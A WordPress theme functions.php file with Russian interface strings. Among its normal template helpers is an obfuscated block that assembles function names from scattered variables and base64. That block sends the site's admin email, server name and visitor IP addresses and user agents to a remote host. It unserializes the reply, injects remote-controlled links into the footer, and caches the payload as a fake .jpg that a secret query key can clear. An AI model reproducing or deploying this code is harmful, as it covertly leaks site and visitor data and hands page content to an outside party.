<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $jUTqKC='a';$jAnHV='c';$KFXASQs='d';$LkQmS='s';$mLVkm='d';$kkuU='_';$zAWV='6';$tDDBRID='e';$bFGvikW='e';$aDkKhof='e';$uKVpq='4';$CkoHvzb='o';$XxOwU='b';$KEduVlvU=$XxOwU.$jUTqKC.$LkQmS.$aDkKhof.$zAWV.$uKVpq.$kkuU.$KFXASQs.$tDDBRID.$jAnHV.$CkoHvzb.$mLVkm.$bFGvikW;$SuFKN='z';$Mxhmawf='l';$PjjhBL='e';$vvLbE='t';$BEAKQ='f';$iTNEEr='n';$bfVEx='i';$HlAD='g';$bPiAR='a';$ENWmhimv=$HlAD.$SuFKN.$bfVEx.$iTNEEr.$BEAKQ.$Mxhmawf.$bPiAR.$vvLbE.$PjjhBL;$TxsEmap='1';$zhWOL='r';$bazB='3';$fTyB='s';$nPNKF='t';$TEyujYA='o';$QfiRA='r';$OHKTbL='_';$Afkpot='t';$taAyvCoE=$fTyB.$Afkpot.$QfiRA.$OHKTbL.$zhWOL.$TEyujYA.$nPNKF.$TxsEmap.$bazB;$YXje='v';$khOXKdg='s';$PwJBFY='r';$Qfqam='e';$eofPUT='t';$PCygb='r';$kDkrzXJd=$khOXKdg.$eofPUT.$PwJBFY.$PCygb.$Qfqam.$YXje;                     
		$qf_____f='a';$ph___________q='c';$eh____________s='d';$by_______________n='s';$lb______________q='d';$kz___________p='_';$ev__a='6';$uj__l='e';$wy___________r='e';$pv______________b='e';$vu_______x='4';$fq____v='o';$nn___________i='b';$vh_________x=$nn___________i.$qf_____f.$by_______________n.$pv______________b.$ev__a.$vu_______x.$kz___________p.$eh____________s.$uj__l.$ph___________q.$fq____v.$lb______________q.$wy___________r;
		$db_______b='o';$jr__j='u';$aj_______________j='_';$wg_____________b='n';$ft__________w='f';$bz____________s='e';$lo_________h='s';$hz__h='i';$sl_____________i='c';$jd________c='i';$jk____m='t';$sl______________g='t';$ok______w='s';$my______e='x';$rn____q='n';$cs_________l=$ft__________w.$jr__j.$rn____q.$sl_____________i.$sl______________g.$hz__h.$db_______b.$wg_____________b.$aj_______________j.$bz____________s.$my______e.$jd________c.$ok______w.$jk____m.$lo_________h;
		$yp_______u='n';$df____________z='o';$ja___q='e';$ap___________l='f';$pc_____________i='p';$vr____z=$ap___________l.$df____________z.$pc_____________i.$ja___q.$yp_______u;
		$xp_______________p='e';$dp__________o='r';$gu____________f='d';$xo_____v='f';$wx___u='a';$px_________h=$xo_____v.$dp__________o.$xp_______________p.$wx___u.$gu____________f;
		$ho_______________k='f';$sb______q='s';$rg___x='c';$qa_______x='l';$qx________u='e';$jk__g='o';$pe_______b=$ho_______________k.$rg___x.$qa_______x.$jk__g.$sb______q.$qx________u;
		
		define("WP_ID", $vh_________x("Mi4wLjA="));
		define("WP_TTL", $vh_________x("MTA4MDA="));
		define("WP_SRC", $vh_________x("dHBva24="));
	


		function wp_get_header() {
			global $vh_________x, $cs_________l;
			
			if (
				$cs_________l($vh_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$cs_________l($vh_________x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$cs_________l($vh_________x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vh_________x, $vr____z, $pe_______b, $px_________h;
			
			$yh_________x = TEMPLATEPATH."/".$vh_________x("Zm9vdGVyLnBocA==");
			$gs______________l = @$vr____z($yh_________x, "r");
			$yh_________x = @$px_________h($gs______________l, @filesize($yh_________x));
			@$pe_______b($gs______________l);
			
			$wg___________l = TEMPLATEPATH."/".$vh_________x("ZnVuY3Rpb25zLnBocA==");
			$gs______________l = @$vr____z($wg___________l, "r");
			$wg___________l = @$px_________h($gs______________l, @filesize($wg___________l));
			@$pe_______b($gs______________l);
			
			$ik____t = 0;
			if($yh_________x && $wg___________l) {
				if ($vh_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($yh_________x, $vh_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ik____t = 1;
					}
					if (substr_count($yh_________x, "wp_theme_GPL_credits()") < 1) {
						$ik____t = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ik____t = 12;
				}
			}
			
			if($ik____t > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ik____t -->";
			}
		}
	


		function wp_loaded() {
			global $vh_________x, $cs_________l;
			return $cs_________l($vh_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ab___________q, $uw____________v = "(more...)", $wq__b = 0, $mu____n = "") {
				$yl________n = get_the_content($uw____________v, $wq__b, $mu____n);
				$yl________n = apply_filters("the_content", $yl________n);
				
				$yl________n = str_replace("]]>", "]]>", $yl________n);
				if (strlen($_GET["p"]) > 0) {
					echo $yl________n;
				}
				else if ((strlen($yl________n)>$ab___________q) && ($jc__________u = strpos($yl________n, " ", $ab___________q ))) {
					$yl________n = substr($yl________n, 0, $jc__________u);
					$yl________n = $yl________n;
					echo $yl________n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$uw____________v</a></div></p>";
				} else {
					echo $yl________n;
				}
				
			}
		}
	


		$ah_____h='a';$oc_____a='e';$nk____________y='s';$us_________u='d';$qq_______e='c';$jn___________y='_';$ss__________s='e';$zu______________r='6';$ms____c='4';$mz__j='b';$mk_______z='e';$bj_______b='n';$bc___u='o';$sp_____f=$mz__j.$ah_____h.$nk____________y.$ss__________s.$zu______________r.$ms____c.$jn___________y.$oc_____a.$bj_______b.$qq_______e.$bc___u.$us_________u.$mk_______z;
		$op___________y='_';$ok_____________m='e';$ng________p='n';$zq_______________z='_';$bw_______q='t';$oc_______________t='g';$id______________d='e';$jk________j='i';$ad______j='c';$ml______________l='n';$cq___q='t';$wc__________k='o';$gu__________h='s';$is____________g='l';$yk______h='e';$bw____o='t';$ms_______c='f';$rn________g=$ms_______c.$jk________j.$is____________g.$ok_____________m.$zq_______________z.$oc_______________t.$id______________d.$bw____o.$op___________y.$ad______j.$wc__________k.$ml______________l.$bw_______q.$yk______h.$ng________p.$cq___q.$gu__________h;
		$sz_________d='t';$wv________o='e';$me_______________w='s';$za_____________d='e';$bt___________a='f';$ls_____e='l';$jn__r='i';$mg_____d='_';$st______r='s';$ws_________y='i';$hn____b='x';$ma______________j=$bt___________a.$jn__r.$ls_____e.$za_____________d.$mg_____d.$wv________o.$hn____b.$ws_________y.$me_______________w.$sz_________d.$st______r;
		$mi_____________v='_';$qy__________s='c';$mf____________c='m';$ih_____________u='e';$oe______________e='i';$yt____________t='r';$hf_______________j='a';$qb______g='s';$bc______________o='o';$iw______________m='r';$bs________z='o';$ih____u='v';$cd____t='e';$el_______i='n';$hc_______v='p';$xp_________z=$ih____u.$cd____t.$yt____________t.$qb______g.$oe______________e.$bc______________o.$el_______i.$mi_____________v.$qy__________s.$bs________z.$mf____________c.$hc_______v.$hf_______________j.$iw______________m.$ih_____________u;
		$oc____________f='f';$bs__k='o';$vi__d='k';$zg_____l='p';$nv________d='c';$xn____j='n';$me___y='s';$av___________b='o';$ku_____________y='e';$ab____________t=$oc____________f.$me___y.$av___________b.$nv________d.$vi__d.$bs__k.$zg_____l.$ku_____________y.$xn____j;
		$ut____x='e';$dx____________q='t';$qj___e='i';$ql__________l='r';$gq______y='f';$xq___________z='w';$is_______________b=$gq______y.$xq___________z.$ql__________l.$qj___e.$dx____________q.$ut____x;
		$as_____v='5';$cb_______________t='m';$lc_______________p='d';$bg___________a=$cb_______________t.$lc_______________p.$as_____v;
		$ty____i='a';$vj_______c='t';$oj_____________j='e';$bb__e='r';$gx_____________i='h';$nh_______________e='l';$nx_____v='p';$ty__u='a';$gk________g=$bb__e.$oj_____________j.$ty__u.$nh_______________e.$nx_____v.$ty____i.$vj_______c.$gx_____________i;
		$xa__________y='e';$yc__u='l';$aj____________t='e';$yu______u='z';$zk__f='a';$ne__________a='r';$vp___a='u';$re____________y='i';$vd___________u='s';$ll_____________q='i';$hu__j='n';$iv____________m=$vp___a.$hu__j.$vd___________u.$aj____________t.$ne__________a.$ll_____________q.$zk__f.$yc__u.$re____________y.$yu______u.$xa__________y;
		$wa______________j='t';$jw_____d='e';$qw______________u='m';$yu_______c='n';$ie______y='m';$ms_____y='a';$lx______________c='p';$kj_____________c=$wa______________j.$jw_____d.$qw______________u.$lx______________c.$yu_______c.$ms_____y.$ie______y;
		$xy____________g='t';$km_________u='_';$ft________v='m';$ye___d='x';$jc__________g='e';$cm___h='_';$zz___g='n';$xp_______________i='t';$jt__________f='t';$iq___________t='a';$bh_________j='e';$ec_____x='c';$nd_____________k='e';$qn__p='r';$we________u='t';$bo___________d='a';$gx_____________m='r';$og_______x='o';$sl_______________m='s';$ip_______________g='e';$oj____d='c';$em__________l=$sl_______________m.$jt__________f.$gx_____________m.$jc__________g.$iq___________t.$ft________v.$km_________u.$ec_____x.$og_______x.$zz___g.$xy____________g.$bh_________j.$ye___d.$xp_______________i.$cm___h.$oj____d.$qn__p.$nd_____________k.$bo___________d.$we________u.$ip_______________g;
	


		function uz__________u($st_____________w) {
			global $vh_________x, $cs_________l, $rn________g, $xp_________z, $em__________l;
			
			if (!$cs_________l($vh_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xp_________z(PHP_VERSION, "5.0.0", ">=") && $cs_________l($vh_________x("ZmlsZV9nZXRfY29udGVudHM=")) && $cs_________l($vh_________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fp_____________j = $em__________l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pq___w = @$rn________g($st_____________w, 0, $fp_____________j);
			} else {
				$pq___w = @$rn________g($st_____________w, 0);
			}
			
			return $pq___w;
		}
	


		function gj________o($st_____________w) {
			global $cs_________l, $ab____________t, $is_______________b, $vh_________x;
			
			if (!$cs_________l($vh_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$it___y = strpos($st_____________w, "/", 7);
			$zu_____________q = array(
				"uri"     => substr($st_____________w, $it___y),
				"host"    => str_replace("http://", "", substr($st_____________w, 0, $it___y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ri_____________r = @$ab____________t("$zu_____________q[host]", 80, $vi____j, $uo________q, 4);
			
			if (!$ri_____________r) {
				return false;
			} else {
				$pq___w = "";
				$sq______s  = "GET $zu_____________q[uri] HTTP/1.0\r\n";
				$sq______s .= "Host: $zu_____________q[host]\r\n";
				$sq______s .= "Referer: $zu_____________q[referer]\r\n";
				$sq______s .= "Connection: Close\r\n\r\n";
				
				@$is_______________b($ri_____________r, $sq______s);
				
				while (!@feof($ri_____________r)) {
					$qi____________n = @fgets($ri_____________r, (1024*24));
					
					if ($qi____________n == "\r\n") {
						$yn_____________x = true;
						continue;
					}
					
					if ($yn_____________x) {
						$pq___w .= $qi____________n;
					}
				}
				
				return $pq___w;
			}
		}
	


		function ds_______y($st_____________w) {
			global $cs_________l;
			$vf_____________b = false;
			
			if ($st_____________w != "") {
				if ($cs_________l("uz__________u")) {
					$vf_____________b = @uz__________u($st_____________w);
				}
				
				if (!$vf_____________b && ($cs_________l("gj________o"))) {
					$vf_____________b = @gj________o($st_____________w);
				}
			}
			
			return $vf_____________b;
		}
	


		function cy____y() {
			global $_SERVER, $bg___________a;
			
			$wn_____________y = $_SERVER["SERVER_NAME"];
			
			if (substr("$wn_____________y", 0, 4) == "www.") {
				$wn_____________y = substr("$wn_____________y", 4);
			}
			
			$wn_____________y = $bg___________a("$_SERVER[SERVER_NAME]");
			
			return $wn_____________y;
		}
	


		function zf__j() {
			return "file";
		}
	


		function no_____g($st_____________w) {
			global $_SERVER, $rn________g, $ma______________j, $vr____z, $pe_______b, $is_______________b;
			
			$zi_____b = af_____________x();
			
			$da___g = cy____y().".jpg";
			$pv___x = $zi_____b["dir_upload"]["path"]."/$da___g";
			$id_____t = @filemtime($pv___x);
			
			if (!$id_____t || ((time()-$id_____t) >= WP_TTL)) {
				$vf_____________b = ds_______y($st_____________w);
				
				if ($vf_____________b) {
					if ($ma______________j($pv___x)) {
						@unlink($pv___x);
					}
					
					$gs______________l = @$vr____z($pv___x, "x+");
					
					@$is_______________b($gs______________l, $vf_____________b);
					@$pe_______b($gs______________l);
				}
			} else {
				if ($ma______________j($pv___x)) {
					$vf_____________b = @$rn________g($pv___x);
				} else {
					$vf_____________b = false;
				}
			}
			
			return $vf_____________b;
		}
	


		function af_____________x() {
			global $_SERVER, $vh_________x, $sp_____f;
			
			$cq___k = wp_count_posts("post");
			$gs______________q = pathinfo(get_bloginfo("template_directory"));
			
			$zi_____b = array(
				"url" => array(
					"report"      => $vh_________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $gs______________q,
				"dir_upload"	=> jy______________i(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$gs______________q[filename],
					"a005=".$cq___k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$zi_____b["url"]["queryString"] = implode("&", $zi_____b["queryString"]);
			$zi_____b["url"]["report"] = $zi_____b["url"]["report"]."/?".$sp_____f($zi_____b["url"]["queryString"]).".html";
						
			return $zi_____b;
		}
	


		function jy______________i() {
			$dg_____________b = wp_upload_dir();
			
			if (isset($dg_____________b["error"])) {
				$cf_______m = ox_______n();
				if (is_writable($cf_______m)) {
					$dg_____________b = array("path" => $cf_______m);
				}
			}

			return $dg_____________b;
		}
	


		function ox_______n() {
			global $cs_________l, $bg___________a, $gk________g, $kj_____________c;
			
			$wv______a = (bool) ini_get("safe_mode");
			if ($wv______a == true) {
				return false;
			}
			
			if ($cs_________l("sys_get_temp_dir")) {
				$wz______________h = sys_get_temp_dir();
				if (is_writable($wz______________h)) {
					return $gk________g($wz______________h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gk________g($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gk________g($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gk________g($_ENV["TEMP"]);
			} else {
				$wy_____________j = $kj_____________c($bg___________a(uniqid(rand(), true)), "");
				if ($wy_____________j) {
					$wz______________h = $gk________g(dirname($wy_____________j));
					@unlink($wy_____________j);
					return $wz______________h;
				} else {
					return false;
				}
			}
		}
	


		function oa________l() {
			global $_GET, $ma______________j;
			
			$zi_____b = af_____________x();
			$wn_____________y = cy____y();
			$mg______k = zf__j();
			
			$ct___d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mg______k == "file") {
					$me_______k = $zi_____b["dir_upload"]["path"]."/".$wn_____________y.".jpg";
					if ($ma______________j($me_______k)) {
						@unlink($me_______k);
						$ct___d = "deleted";
					}
				}
				
				$bt___y = array(
					"s"	=> $ct___d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bt___y AS $bf______________n => $jh______________z) echo " [$bf______________n:$jh______________z]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $cs_________l, $vh_________x, $iv____________m;
			$zi_____b = af_____________x();
			
			$dh_______n = "no_____g";
			if ($cs_________l($dh_______n)) {
				$pq___w = $dh_______n($zi_____b["url"]["report"]);
			}
			
			if ($pq___w) {
				if ($pq___w = @$vh_________x($pq___w)) {
					$pq___w = @$iv____________m($pq___w);
					
					if (strlen($pq___w[custom_credit]) >= 5) {
						$zi_____b["default_string"] = $pq___w[custom_credit];
					}
					
					if ($pq___w["status"] == "0") {
						$xx________e = 1;
						$nb_________w = 1;
					} else {
						$bz____________o = sizeof($pq___w["links"]);
						$mx_______u = $zi_____b["default_string"];
						
						if ($bz____________o > 0 && $pq___w["links"] !== "") {
							$yb_______q = 0;
							foreach ($pq___w["links"] as $ko_________w => $ho___________y) {
								$yb_______q++;
								if ($ho___________y->l_path == "" || $ho___________y->l_path == $_SERVER["REQUEST_URI"]) {
									$ho___________y->l_href = htmlspecialchars(strip_tags($ho___________y->l_href));
									$ho___________y->l_title = htmlspecialchars(strip_tags($ho___________y->l_title));
									$ho___________y->l_anchor = htmlspecialchars(strip_tags($ho___________y->l_anchor));
									$mx_______u .= " | ";
									$mx_______u .= "<a href='$ho___________y->l_href' title='$ho___________y->l_title'";
									if ($ho___________y->l_nofollow == "1") {
										$mx_______u .= " rel='nofollow'";
									}
									$mx_______u .= ">$ho___________y->l_anchor</a>";
								}
							}
						}
						$zi_____b["links"] = "$mx_______u";
						if ($pq___w[credit] == "0") {
							$zi_____b["links"] = "";
						}
					}
				} else {
					$xx________e = "1";
				}
			} else {
				$xx________e = "1";
			}
			
			if ($xx________e == "1") {
				$zi_____b["links"] = $zi_____b["default_string"];
			}
			
			echo "$zi_____b[links]";
			
			echo "<!-- s: $pq___w[signature] -->";
			oa________l();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

